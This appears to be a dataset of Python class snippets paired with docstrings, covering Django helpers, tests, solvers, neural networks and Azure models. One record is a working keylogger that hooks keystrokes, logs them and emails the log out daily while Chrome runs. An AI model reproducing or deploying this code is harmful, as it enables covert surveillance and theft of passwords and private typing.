Columns: code (string, length 4 to 4.48k), docstring (string, length 1 to 6.45k), _id (string, length 24)
class ChoicesIntEnum(IntEnum): <NEW_LINE> <INDENT> @classmethod <NEW_LINE> def choices(cls): <NEW_LINE> <INDENT> return [(item.value, _(ChoicesIntEnum.capitalize(item))) for item in cls] <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def capitalize(cls, item): <NEW_LINE> <INDENT> name = item.name.replace("_", " ") <NEW_LINE> return name[0].capitalize() + name[1:] <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def values(cls): <NEW_LINE> <INDENT> return [item.value for item in cls]
Extends IntEnum with Django choices generation capability.
6259906891f36d47f2231a60
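A minimal usage sketch for the ChoicesIntEnum record above; OrderStatus is a hypothetical subclass, and the class is assumed to live in a module where _ is Django's gettext:

    # Hypothetical subclass of the ChoicesIntEnum defined above.
    class OrderStatus(ChoicesIntEnum):
        new_order = 1
        in_progress = 2
        done = 3

    OrderStatus.choices()  # [(1, 'New order'), (2, 'In progress'), (3, 'Done')]
    OrderStatus.values()   # [1, 2, 3]

    # Typical Django model usage (illustrative):
    # status = models.IntegerField(choices=OrderStatus.choices(), default=OrderStatus.new_order)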
class UserTest(BaseTest): <NEW_LINE> <INDENT> def test_crud(self): <NEW_LINE> <INDENT> with self.app_context(): <NEW_LINE> <INDENT> user = UserModel('[email protected]','testuser','abcd') <NEW_LINE> self.assertIsNone(UserModel.find_by_username('testuser'), "Found a user with name 'testuser' before save_to_db") <NEW_LINE> self.assertIsNone(UserModel.find_by_id(1), "Found a user with id '1' before save_to_db") <NEW_LINE> user.save_to_db() <NEW_LINE> self.assertIsNotNone(UserModel.find_by_username('testuser'), "Did not find a user with name 'testuser' after save_to_db") <NEW_LINE> self.assertIsNotNone(UserModel.find_by_id(1), "Did not find a user with id '1' after save_to_db") <NEW_LINE> self.assertEqual(user.username, 'testuser', "The name of the user after creation does not equal the constructor argument.") <NEW_LINE> self.assertEqual(user.password, 'abcd', "The password of the user after creation does not equal the constructor argument.")
Accesses the app context in order to create a mock-up db.
6259906845492302aabfdc7f
class make_solver: <NEW_LINE> <INDENT> def __init__(self, A, coarsening=pyamgcl_ext.coarsening.smoothed_aggregation, relaxation=pyamgcl_ext.relaxation.spai0, solver=pyamgcl_ext.solver_type.bicgstabl, prm={} ): <NEW_LINE> <INDENT> Acsr = A.tocsr() <NEW_LINE> self.S = pyamgcl_ext.make_solver( coarsening, relaxation, solver, prm, Acsr.indptr.astype(numpy.int32), Acsr.indices.astype(numpy.int32), Acsr.data.astype(numpy.float64) ) <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return self.S.__repr__() <NEW_LINE> <DEDENT> def __call__(self, *args): <NEW_LINE> <INDENT> if len(args) == 1: <NEW_LINE> <INDENT> return self.S( args[0].astype(numpy.float64) ) <NEW_LINE> <DEDENT> elif len(args) == 2: <NEW_LINE> <INDENT> Acsr = args[0].tocsr() <NEW_LINE> return self.S( Acsr.indptr.astype(numpy.int32), Acsr.indices.astype(numpy.int32), Acsr.data.astype(numpy.float64), args[1].astype(numpy.float64) ) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> raise ValueError("Wrong number of arguments") <NEW_LINE> <DEDENT> <DEDENT> def iterations(self): <NEW_LINE> <INDENT> return self.S.iterations() <NEW_LINE> <DEDENT> def residual(self): <NEW_LINE> <INDENT> return self.S.residual()
Iterative solver preconditioned by algebraic multigrid. The class builds an algebraic multigrid hierarchy for the given matrix and uses the hierarchy as a preconditioner for the specified iterative solver.
625990683539df3088ecda42
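A usage sketch for the make_solver wrapper above, assuming scipy and the pyamgcl extension module are available; the 1-D Poisson system is a stand-in problem:

    import numpy
    from scipy.sparse import diags

    n = 1000
    A = diags([-1, 2, -1], [-1, 0, 1], shape=(n, n))  # 1-D Poisson matrix (stand-in)
    b = numpy.ones(n)

    solve = make_solver(A)   # builds the AMG hierarchy from A.tocsr()
    x = solve(b)             # one-argument form reuses the stored matrix
    print(solve.iterations(), solve.residual())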
class KeyLogger(object): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self.log_controller = Log() <NEW_LINE> self.log_controller.writeMessage("Keylogger Constructor called\n") <NEW_LINE> self.should_keylogger_stop = False <NEW_LINE> self.send_keylog_flag = True <NEW_LINE> create_file = open(Constants.KEY_STROKES_LOG, Constants.OVERWRITE_MODE) <NEW_LINE> create_file.write("Key Stroke Log create:\n") <NEW_LINE> create_file.close() <NEW_LINE> <DEDENT> def writetokeystrokelog(self, message): <NEW_LINE> <INDENT> f = open(Constants.KEY_STROKES_LOG, Constants.APPEND_MODE) <NEW_LINE> f.writelines(message) <NEW_LINE> f.close() <NEW_LINE> <DEDENT> def clearkeystrokelog(self): <NEW_LINE> <INDENT> f = open(Constants.KEY_STROKES_LOG, Constants.OVERWRITE_MODE) <NEW_LINE> f.writelines("") <NEW_LINE> f.close() <NEW_LINE> <DEDENT> def startKeyLogger(self): <NEW_LINE> <INDENT> log_message = "Started keylogger\n" <NEW_LINE> self.log_controller.writeMessage(log_message) <NEW_LINE> hm = pyHook.HookManager() <NEW_LINE> hm.KeyDown = self.OnKeyboardEvent <NEW_LINE> hm.HookKeyboard() <NEW_LINE> while not self.should_keylogger_stop: <NEW_LINE> <INDENT> pythoncom.PumpWaitingMessages() <NEW_LINE> <DEDENT> self.log_controller.writeMessage("Confirmation of Keylogger termination\n") <NEW_LINE> <DEDENT> def send_keylog(self): <NEW_LINE> <INDENT> while self.send_keylog_flag: <NEW_LINE> <INDENT> time.sleep(86400) <NEW_LINE> try: <NEW_LINE> <INDENT> email_controller = AttachMail() <NEW_LINE> email_controller.start_server() <NEW_LINE> email_controller.sendMail(Constants.EMAIL_DESTINATION_LIST, "KeyLog File Attached", "Sent from your friend ...", Constants.KEY_STROKES_LOG) <NEW_LINE> email_controller.stop_server() <NEW_LINE> self.clearkeystrokelog() <NEW_LINE> <DEDENT> except: <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def stop_to_send_keylog(self): <NEW_LINE> <INDENT> time.sleep(2592000) <NEW_LINE> self.send_keylog_flag = False <NEW_LINE> <DEDENT> def OnKeyboardEvent(self, event): <NEW_LINE> <INDENT> self.writetokeystrokelog(chr(event.Ascii)) <NEW_LINE> <DEDENT> def stopkeylogger(self): <NEW_LINE> <INDENT> while not self.should_keylogger_stop: <NEW_LINE> <INDENT> time.sleep(50) <NEW_LINE> self.should_keylogger_stop = not self.isChromeRunning() <NEW_LINE> if self.should_keylogger_stop: <NEW_LINE> <INDENT> self.log_controller.writeMessage("Switched should_keylogger_stop flag to True\n") <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def isChromeRunning(self): <NEW_LINE> <INDENT> log_message = "Checked if Chrome was running\n" <NEW_LINE> self.log_controller.writeMessage(log_message) <NEW_LINE> for process in psutil.process_iter(): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> if process.name() == Constants.CHROME_PROCESS_NAME: <NEW_LINE> <INDENT> log_message = "Chrome seems to be running\n" <NEW_LINE> self.log_controller.writeMessage(log_message) <NEW_LINE> return True <NEW_LINE> <DEDENT> <DEDENT> except (psutil.NoSuchProcess, psutil.AccessDenied): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> <DEDENT> log_message = "Chrome does not seem to be running\n" <NEW_LINE> self.log_controller.writeMessage(log_message) <NEW_LINE> return False
Contains methods for starting and using keylogger
6259906876e4537e8c3f0d25
class TestLine(unittest.TestCase): <NEW_LINE> <INDENT> def setUp(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def tearDown(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def testLine(self): <NEW_LINE> <INDENT> pass
Line unit test stubs
62599068a8370b77170f1b68
class TestMister(): <NEW_LINE> <INDENT> def test_radius(self): <NEW_LINE> <INDENT> from mister import Mister <NEW_LINE> mr = Mister() <NEW_LINE> out = mr.radius([0, 0.1, 0.5]) <NEW_LINE> assert len(out) == 1 <NEW_LINE> assert isinstance(out[0], float) <NEW_LINE> <DEDENT> def test_radius2(self): <NEW_LINE> <INDENT> from mister import Mister <NEW_LINE> mr = Mister() <NEW_LINE> out = mr.radius([[0.5, 1.0, 0.75], [-3, 10.0, 0.25]]) <NEW_LINE> assert len(out) == 2 <NEW_LINE> assert isinstance(out[0], float) <NEW_LINE> <DEDENT> def test_lifetime(self): <NEW_LINE> <INDENT> from mister import Mister <NEW_LINE> mr = Mister() <NEW_LINE> out = mr.lifetime([0, 0.3]) <NEW_LINE> assert len(out) == 1 <NEW_LINE> assert isinstance(out[0], float)
Test Mister functions.
625990688e7ae83300eea830
class recorded(object): <NEW_LINE> <INDENT> def __init__(self, func): <NEW_LINE> <INDENT> self.func = func <NEW_LINE> <DEDENT> def __get__(self, instance, owner): <NEW_LINE> <INDENT> func = self.func <NEW_LINE> if instance is not None: <NEW_LINE> <INDENT> func = RecordedMethod(self.func, instance) <NEW_LINE> <DEDENT> return func
>>> class C(RecordableMethods):
...     @recorded
...     def plus1(self, n):
...         return n + 1
>>>
>>> c = C()
>>> c.plus1(5)
6
>>> c.plus1.seed(5)(7)
>>> c.plus1(5)
7
>>> c.plus1(4)
5
>>> c.methods_called()
['plus1', 'plus1', 'plus1']
>>> c.methods_called(with_args=True)
[('plus1', (5,), {}), ('plus1', (5,), {}), ('plus1', (4,), {})]
>>> c = C()
>>> c.plus1.seed(n=5)(8)
>>> c.plus1(5)
6
>>> c.plus1(n=5)
8
>>> c.methods_called(with_args=True)
[('plus1', (5,), {}), ('plus1', (), {'n': 5})]
>>> c = C()
>>> c.plus1.seed(5)(9)
>>> c.plus1.seed(5)(10)
>>> c.plus1(5)
10
>>> c.plus1.seed(5)(ValueError())
>>> c.plus1(5)
Traceback (most recent call last):
    ...
ValueError
>>> c.plus1.seed(5)(ValueError)
>>> c.plus1(5)
Traceback (most recent call last):
    ...
ValueError
62599068009cb60464d02cdc
class ThreeLayerConvNet(object): <NEW_LINE> <INDENT> def __init__(self, input_dim=(3, 32, 32), num_filters=32, filter_size=7, hidden_dim=100, num_classes=10, weight_scale=1e-3, reg=0.0, dtype=np.float32): <NEW_LINE> <INDENT> self.params = {} <NEW_LINE> self.reg = reg <NEW_LINE> self.dtype = dtype <NEW_LINE> C, H, W = input_dim <NEW_LINE> self.params['W1'] = weight_scale * np.random.randn(num_filters, C, filter_size, filter_size) <NEW_LINE> self.params['b1'] = np.zeros((1, num_filters)) <NEW_LINE> self.params['W2'] = weight_scale * np.random.randn(H * W / 4 * num_filters, hidden_dim) <NEW_LINE> self.params['b2'] = np.zeros((1, hidden_dim)) <NEW_LINE> self.params['W3'] = weight_scale * np.random.randn(hidden_dim, num_classes) <NEW_LINE> self.params['b3'] = np.zeros((1, num_classes)) <NEW_LINE> for k, v in self.params.iteritems(): <NEW_LINE> <INDENT> self.params[k] = v.astype(dtype) <NEW_LINE> <DEDENT> <DEDENT> def loss(self, X, y=None): <NEW_LINE> <INDENT> W1, b1 = self.params['W1'], self.params['b1'] <NEW_LINE> W2, b2 = self.params['W2'], self.params['b2'] <NEW_LINE> W3, b3 = self.params['W3'], self.params['b3'] <NEW_LINE> filter_size = W1.shape[2] <NEW_LINE> conv_param = {'stride': 1, 'pad': (filter_size - 1) / 2} <NEW_LINE> pool_param = {'pool_height': 2, 'pool_width': 2, 'stride': 2} <NEW_LINE> scores = None <NEW_LINE> L1_out, L1_cache = conv_relu_pool_forward(X, W1, b1, conv_param, pool_param) <NEW_LINE> L2_out, L2_cache = affine_relu_forward(L1_out, W2, b2) <NEW_LINE> L3_out, L3_cache = affine_forward(L2_out, W3, b3) <NEW_LINE> scores = L3_out <NEW_LINE> if y is None: <NEW_LINE> <INDENT> return scores <NEW_LINE> <DEDENT> loss, grads = 0, {} <NEW_LINE> loss, dscores = softmax_loss(scores, y) <NEW_LINE> loss += 0.5 * self.reg * (np.sum(W1 * W1) + np.sum(W2 * W2) + np.sum(W3 * W3)) <NEW_LINE> dx3, grads['W3'], grads['b3'] = affine_backward(dscores, L3_cache) <NEW_LINE> grads['W3'] += self.reg * W3 <NEW_LINE> dx2, grads['W2'], grads['b2'] = affine_relu_backward(dx3, L2_cache) <NEW_LINE> grads['W2'] += self.reg * W2 <NEW_LINE> dx1, grads['W1'], grads['b1'] = conv_relu_pool_backward(dx2, L1_cache) <NEW_LINE> grads['W1'] += self.reg * W1 <NEW_LINE> return loss, grads
A three-layer convolutional network with the following architecture:

conv - relu - 2x2 max pool - affine - relu - affine - softmax

The network operates on minibatches of data that have shape (N, C, H, W) consisting of N images, each with height H and width W and with C input channels.
62599068baa26c4b54d50a48
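A smoke-test sketch for the ThreeLayerConvNet above. It assumes the cs231n-style layer helpers the class calls (conv_relu_pool_forward and friends) are importable from the same package, and that the class runs under the Python 2 semantics it was written for (iteritems, integer division):

    import numpy as np

    model = ThreeLayerConvNet(input_dim=(3, 32, 32), num_filters=8,
                              filter_size=7, hidden_dim=50, num_classes=10)
    X = np.random.randn(20, 3, 32, 32)   # minibatch of 20 images, (N, C, H, W)
    y = np.random.randint(10, size=20)   # integer class labels

    scores = model.loss(X)               # test-time forward pass: (20, 10) class scores
    loss, grads = model.loss(X, y)       # training mode: softmax loss and gradients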
class PaginationError(Exception): <NEW_LINE> <INDENT> def __init__(self, message): <NEW_LINE> <INDENT> self.message = message
Exception raised when an error occurs during pagination.
625990687d847024c075db7c
class DatatableMetaclass(type): <NEW_LINE> <INDENT> def __new__(cls, name, bases, attrs): <NEW_LINE> <INDENT> declared_columns = get_declared_columns(bases, attrs, with_base_columns=False) <NEW_LINE> new_class = super(DatatableMetaclass, cls).__new__(cls, name, bases, attrs) <NEW_LINE> opts = new_class._meta = new_class.options_class(getattr(new_class, "Meta", None)) <NEW_LINE> if opts.model: <NEW_LINE> <INDENT> columns = columns_for_model( opts.model, opts.columns, opts.exclude, opts.labels, opts.processors, opts.unsortable_columns, opts.hidden_columns, ) <NEW_LINE> none_model_columns = [k for k, v in columns.items() if not v] <NEW_LINE> missing_columns = set(none_model_columns) - set(declared_columns.keys()) <NEW_LINE> for name, column in declared_columns.items(): <NEW_LINE> <INDENT> column.name = name <NEW_LINE> if not column.label: <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> field = resolve_orm_path(opts.model, name) <NEW_LINE> <DEDENT> except FieldDoesNotExist: <NEW_LINE> <INDENT> label = name <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> label = field.verbose_name <NEW_LINE> <DEDENT> column.label = pretty_name(label) <NEW_LINE> <DEDENT> <DEDENT> if isinstance(opts.search_fields, dict): <NEW_LINE> <INDENT> search_fields = [] <NEW_LINE> for name, column in opts.search_fields.items(): <NEW_LINE> <INDENT> if callable(column): <NEW_LINE> <INDENT> column = column(sources=[name]) <NEW_LINE> <DEDENT> search_fields.append(column) <NEW_LINE> <DEDENT> opts.search_fields = search_fields <NEW_LINE> <DEDENT> elif opts.search_fields is None: <NEW_LINE> <INDENT> opts.search_fields = [] <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> opts.search_fields = list(opts.search_fields) <NEW_LINE> <DEDENT> for i, column in enumerate(opts.search_fields): <NEW_LINE> <INDENT> if isinstance(column, str): <NEW_LINE> <INDENT> name = column <NEW_LINE> field = resolve_orm_path(opts.model, name) <NEW_LINE> column = get_column_for_modelfield(field) <NEW_LINE> opts.search_fields[i] = column(sources=[name]) <NEW_LINE> <DEDENT> <DEDENT> columns.update(declared_columns) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> columns = declared_columns <NEW_LINE> missing_columns = [] <NEW_LINE> <DEDENT> new_class.declared_columns = declared_columns <NEW_LINE> new_class.base_columns = columns <NEW_LINE> new_class.missing_columns = missing_columns <NEW_LINE> return new_class
Each declared Datatable object inspects its declared "fields" in order to facilitate an inheritance system resembling the django.forms system. Except for our custom Meta options that offer field options ('labels', 'processors', etc), this code is essentially a clone of the django.forms strategy.
625990680c0af96317c57930
class EndingPoint(Node): <NEW_LINE> <INDENT> def __init__(self,env,name, uid=None): <NEW_LINE> <INDENT> super().__init__(env=env,name=name, uid=uid) <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return f"{self.name}" <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return f"{self.name}" <NEW_LINE> <DEDENT> def reset(self): <NEW_LINE> <INDENT> self.count = 0 <NEW_LINE> self.entities = set() <NEW_LINE> <DEDENT> def summary(self): <NEW_LINE> <INDENT> encountered = {} <NEW_LINE> for entity in self.entities: <NEW_LINE> <INDENT> if not entity.start.name in encountered: <NEW_LINE> <INDENT> encountered[entity.start.name] = 0 <NEW_LINE> <DEDENT> encountered[entity.start.name] += 1 <NEW_LINE> <DEDENT> entity_durations = [x.end_time-x.start_time for x in self.entities] <NEW_LINE> return { "name" : self.name, "number of caught entities" : len(self.entities), "number of entities by start node" : encountered, "most common travel path" : collections.Counter(tuple(x.summary()['travelled path']) for x in self.entities).most_common(1)[0] if len(self.entities) > 0 else None, "average entity duration." : np.mean(entity_durations) if len(entity_durations) > 0 else None } <NEW_LINE> <DEDENT> def serialize(self): <NEW_LINE> <INDENT> return { "name" : self.name, "uid" : self.uid }
EndingPoint represents a single collection point where entities finish their trip through the system.
625990687d43ff2487427fe2
@attr(shard=2) <NEW_LINE> @ddt.ddt <NEW_LINE> class IndexQueryTestCase(ModuleStoreTestCase): <NEW_LINE> <INDENT> CREATE_USER = False <NEW_LINE> NUM_PROBLEMS = 20 <NEW_LINE> @ddt.data( (ModuleStoreEnum.Type.mongo, 8), (ModuleStoreEnum.Type.split, 4), ) <NEW_LINE> @ddt.unpack <NEW_LINE> def test_index_query_counts(self, store_type, expected_query_count): <NEW_LINE> <INDENT> with self.store.default_store(store_type): <NEW_LINE> <INDENT> course = CourseFactory.create() <NEW_LINE> with self.store.bulk_operations(course.id): <NEW_LINE> <INDENT> chapter = ItemFactory.create(category='chapter', parent_location=course.location) <NEW_LINE> section = ItemFactory.create(category='sequential', parent_location=chapter.location) <NEW_LINE> vertical = ItemFactory.create(category='vertical', parent_location=section.location) <NEW_LINE> for _ in range(self.NUM_PROBLEMS): <NEW_LINE> <INDENT> ItemFactory.create(category='problem', parent_location=vertical.location) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> password = 'test' <NEW_LINE> self.user = UserFactory(password=password) <NEW_LINE> self.client.login(username=self.user.username, password=password) <NEW_LINE> CourseEnrollment.enroll(self.user, course.id) <NEW_LINE> with check_mongo_calls(expected_query_count): <NEW_LINE> <INDENT> url = reverse( 'courseware_section', kwargs={ 'course_id': unicode(course.id), 'chapter': unicode(chapter.location.name), 'section': unicode(section.location.name), } ) <NEW_LINE> response = self.client.get(url) <NEW_LINE> self.assertEqual(response.status_code, 200)
Tests for query count.
625990682ae34c7f260ac88b
class OUNoise: <NEW_LINE> <INDENT> def __init__(self, size, seed, mu=0., theta=0.15, sigma=0.2): <NEW_LINE> <INDENT> self.mu = mu * torch.ones(size, device=device) <NEW_LINE> self.theta = theta <NEW_LINE> self.sigma = sigma <NEW_LINE> self.seed = torch.manual_seed(seed) <NEW_LINE> self.reset() <NEW_LINE> <DEDENT> def reset(self): <NEW_LINE> <INDENT> self.state = copy.copy(self.mu) <NEW_LINE> <DEDENT> def sample(self): <NEW_LINE> <INDENT> x = self.state <NEW_LINE> dx = self.theta * (self.mu - x) + self.sigma * torch.randn(len(x), device=device) <NEW_LINE> self.state = x + dx <NEW_LINE> return self.state
Ornstein-Uhlenbeck process.
6259906892d797404e38972f
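A typical DDPG-style usage sketch for OUNoise; device is assumed to be a module-level torch.device, as in the original code:

    import torch

    device = torch.device("cpu")            # assumption: module-level device used by OUNoise
    noise = OUNoise(size=4, seed=0)         # one noise component per action dimension

    action = torch.zeros(4, device=device)
    noisy_action = action + noise.sample()  # add temporally correlated exploration noise
    noise.reset()                           # reset the internal state at episode boundaries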
class TestSequence(unittest.TestCase): <NEW_LINE> <INDENT> def runTest(self): <NEW_LINE> <INDENT> test_string = ("{DISK_BLADE,2}{RACK,36}") <NEW_LINE> bigbuf=oh_big_textbuffer() <NEW_LINE> ep=SaHpiEntityPathT() <NEW_LINE> err = oh_encode_entitypath(test_string, ep) <NEW_LINE> self.assertEqual (err!=None,True) <NEW_LINE> self.assertEqual (ep.Entry[0].EntityType != SAHPI_ENT_RACK,False) <NEW_LINE> self.assertEqual (ep.Entry[0].EntityLocation != 36,False) <NEW_LINE> self.assertEqual (ep.Entry[1].EntityType != SAHPI_ENT_DISK_BLADE,False) <NEW_LINE> self.assertEqual (ep.Entry[1].EntityLocation != 2,False) <NEW_LINE> oh_init_bigtext(bigbuf) <NEW_LINE> err = oh_decode_entitypath(ep, bigbuf) <NEW_LINE> self.assertEqual (err!=None,True) <NEW_LINE> self.assertEqual (bigbuf.Data!= test_string,False)
main: epathstr -> epath test. Test if an entity path string is converted properly into an entity path.
625990682c8b7c6e89bd4f8a
class PCAFactorizer(): <NEW_LINE> <INDENT> def __init__(self, num_components): <NEW_LINE> <INDENT> self.model = PCA(n_components = num_components) <NEW_LINE> self.num_components = num_components <NEW_LINE> <DEDENT> def fit(self, X): <NEW_LINE> <INDENT> X = X / np.std(X, axis=1).reshape((-1, 1)) <NEW_LINE> self.model.fit(X) <NEW_LINE> <DEDENT> def transform(self, X): <NEW_LINE> <INDENT> X = X / np.std(X, axis=1).reshape((-1, 1)) <NEW_LINE> return self.model.transform(X)
Factorizer using principal component analysis. Reduces dimension of input by projecting onto first num_components principal components.

Note: normalizes input before fitting.

Attributes:
    model (PCA): sklearn PCA model
    num_components (int): Number of principal components to use.
62599068f548e778e596cd2f
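A quick sketch of fitting and transforming with PCAFactorizer, assuming sklearn.decomposition.PCA and numpy are imported as in the class above:

    import numpy as np

    X = np.random.randn(200, 50)              # 200 samples, 50 features
    factorizer = PCAFactorizer(num_components=5)
    factorizer.fit(X)                          # rows are std-normalized before fitting
    Z = factorizer.transform(X)                # reduced data, shape (200, 5)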
class User(SQLAlchemyObjectType): <NEW_LINE> <INDENT> class Meta: <NEW_LINE> <INDENT> model = UserModel
Autogenerated return type of a user
62599068aad79263cf42ff5c
class CmdlineParser(ArgumentParser): <NEW_LINE> <INDENT> def __init__(self, desc=None, prog=sys.argv[0], usage=None, add_help=True, argument_default=None, prefix_chars="-", toplevel=False): <NEW_LINE> <INDENT> super(CmdlineParser, self).__init__(description=desc, prog=prog, usage=usage, add_help=add_help, argument_default=argument_default, prefix_chars=prefix_chars, formatter_class=FafHelpFormatter) <NEW_LINE> self.add_argument("-v", "--verbose", action="store_const", const=logging.DEBUG, default=logging.INFO, help="turn on all verbose output except for SQL") <NEW_LINE> self.add_argument("--sql-verbose", action="store_true", default=False, help="show all SQL queries (really verbose)") <NEW_LINE> self.add_argument("-d", "--debug", action="store_true", default=False, help="show full traceback for unhandled exceptions") <NEW_LINE> self.add_argument("--dry-run", action="store_true", default=False, help="do not flush any changes to the database") <NEW_LINE> if toplevel: <NEW_LINE> <INDENT> action_parsers = self.add_subparsers(title="action") <NEW_LINE> for action in actions: <NEW_LINE> <INDENT> action_parser = action_parsers.add_parser(action) <NEW_LINE> actions[action].tweak_cmdline_parser(action_parser) <NEW_LINE> action_parser.set_defaults(func=actions[action].run) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def parse_args(self, args=None, namespace=None): <NEW_LINE> <INDENT> result = ArgumentParser.parse_args(self, args=args, namespace=namespace) <NEW_LINE> log.setLevel(result.verbose) <NEW_LINE> return result <NEW_LINE> <DEDENT> def _add_plugin_arg(self, *args, **kwargs): <NEW_LINE> <INDENT> if kwargs.pop("multiple", False): <NEW_LINE> <INDENT> kwargs["action"] = "append" <NEW_LINE> kwargs["default"] = [] <NEW_LINE> <DEDENT> self.add_argument(*args, **kwargs) <NEW_LINE> <DEDENT> def add_bugtracker(self, *args, **kwargs): <NEW_LINE> <INDENT> defaults = dict( help="bug tracker", choices=bugtrackers, multiple=False, ) <NEW_LINE> defaults.update(kwargs) <NEW_LINE> self._add_plugin_arg("-b", "--bugtracker", **defaults) <NEW_LINE> <DEDENT> def add_opsys(self, multiple=False, required=False): <NEW_LINE> <INDENT> self._add_plugin_arg("-o", "--opsys", required=required, help="operating system", multiple=multiple) <NEW_LINE> <DEDENT> def add_opsys_release(self, multiple=False, required=False): <NEW_LINE> <INDENT> self._add_plugin_arg("--opsys-release", required=required, help="operating system release", multiple=multiple) <NEW_LINE> <DEDENT> def add_problemtype(self, multiple=False): <NEW_LINE> <INDENT> self._add_plugin_arg("-p", "--problemtype", help="problem type", multiple=multiple) <NEW_LINE> <DEDENT> def add_repo(self, multiple=False): <NEW_LINE> <INDENT> self._add_plugin_arg("-r", "--repo", help="repository", multiple=multiple) <NEW_LINE> <DEDENT> def add_solutionfinder(self, *args, **kwargs): <NEW_LINE> <INDENT> defaults = dict( help="solution finder", choices=solution_finders, multiple=True, ) <NEW_LINE> defaults.update(kwargs) <NEW_LINE> self._add_plugin_arg("-s", "--solution-finder", **defaults)
Command line argument parser extended with project-specific options.
62599068a219f33f346c7fac
class Refp(ModeledCommandParameter, PseudoRegion): <NEW_LINE> <INDENT> begtag = 'REFP' <NEW_LINE> endtag = '' <NEW_LINE> models = { 'model_descriptor': {'desc': 'Phase model', 'name': 'phmodref', 'num_parms': 5, 'for001_format': {'line_splits': [5]}}, '0_crossing': {'desc': '0-crossing phase iterative procedure', 'doc': 'Uses iterative procedure to find 0-crossing phase; tracks through all regions. Only works with ACCEL modesl 1,2 and 13.', 'icool_model_name': 2, 'parms': {'phmodref': {'pos': 5, 'type': 'String', 'doc': ''}, 'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}}}, 'const_v': {'desc': 'Assumes constant reference particle velocity', 'doc': 'Applies to any region', 'icool_model_name': 3, 'parms': {'phmodref': {'pos': 5, 'type': 'String', 'doc': ''}, 'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}, 'pz0': {'pos': 2, 'type': 'Real', 'doc': ''}, 't0': {'pos': 3, 'type': 'Real', 'doc': ''}}}, 'en_loss': {'desc': 'Assumes constant reference particle velocity', 'doc': 'Applies to any region', 'icool_model_name': 4, 'parms': {'phmodref': {'pos': 5, 'type': 'String', 'doc': ''}, 'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}, 'pz0': {'pos': 2, 'type': 'Real', 'doc': ''}, 't0': {'pos': 3, 'type': 'Real', 'doc': ''}, 'dedz': {'pos': 4, 'type': 'Real', 'doc': ''}}}, 'delta_quad_cav': {'desc': 'Assumes constant reference particle velocity', 'doc': 'Applies to any region', 'icool_model_name': 5, 'parms': {'phmodref': {'pos': 5, 'type': 'String', 'doc': ''}, 'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}, 'e0': {'pos': 2, 'type': 'Real', 'doc': ''}, 'dedz': {'pos': 3, 'type': 'Real', 'doc': ''}, 'd2edz2': {'pos': 4, 'type': 'Real', 'doc': ''}}}, 'delta_quad_any': {'desc': 'Assumes constant reference particle velocity', 'doc': 'Applies to any region', 'icool_model_name': 6, 'parms': {'phmodref': {'pos': 5, 'type': 'String', 'doc': ''}, 'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}, 'e0': {'pos': 2, 'type': 'Real', 'doc': ''}, 'dedz': {'pos': 3, 'type': 'Real', 'doc': ''}, 'd2edz2': {'pos': 4, 'type': 'Real', 'doc': ''}}}, } <NEW_LINE> def __init__(self, **kwargs): <NEW_LINE> <INDENT> if ModeledCommandParameter.check_command_params_init(self, Refp.models, **kwargs) is False: <NEW_LINE> <INDENT> sys.exit(0) <NEW_LINE> <DEDENT> <DEDENT> def __call__(self, **kwargs): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def __setattr__(self, name, value): <NEW_LINE> <INDENT> self.__modeled_command_parameter_setattr__(name, value, Refp.models) <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> pass
Reference particle
625990683d592f4c4edbc683
class DS18B20(BaseThermometers): <NEW_LINE> <INDENT> def __init__(self, **config): <NEW_LINE> <INDENT> super().__init__(config) <NEW_LINE> self._vendor = "Dallas" <NEW_LINE> self._model = "DS18B20" <NEW_LINE> <DEDENT> def get_temp(self): <NEW_LINE> <INDENT> return self._controller.read_temperature(self._config["dev"], self._config["circuit"])
Digital thermometer by Dallas.
625990684a966d76dd5f0699
class ApplicationSecurityGroupListResult(msrest.serialization.Model): <NEW_LINE> <INDENT> _validation = { 'next_link': {'readonly': True}, } <NEW_LINE> _attribute_map = { 'value': {'key': 'value', 'type': '[ApplicationSecurityGroup]'}, 'next_link': {'key': 'nextLink', 'type': 'str'}, } <NEW_LINE> def __init__( self, *, value: Optional[List["ApplicationSecurityGroup"]] = None, **kwargs ): <NEW_LINE> <INDENT> super(ApplicationSecurityGroupListResult, self).__init__(**kwargs) <NEW_LINE> self.value = value <NEW_LINE> self.next_link = None
A list of application security groups.

Variables are only populated by the server, and will be ignored when sending a request.

:param value: A list of application security groups.
:type value: list[~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroup]
:ivar next_link: The URL to get the next set of results.
:vartype next_link: str
62599068009cb60464d02cdd
class Producer(threading.Thread): <NEW_LINE> <INDENT> def run(self): <NEW_LINE> <INDENT> global GOODS <NEW_LINE> while True: <NEW_LINE> <INDENT> time.sleep(3) <NEW_LINE> condition.acquire() <NEW_LINE> while GOODS >= 10: <NEW_LINE> <INDENT> condition.notify_all() <NEW_LINE> condition.wait() <NEW_LINE> <DEDENT> GOODS += 1 <NEW_LINE> print('生产者[%s]生产了1个商品,商品总数:%s' % (threading.current_thread(), GOODS)) <NEW_LINE> condition.release()
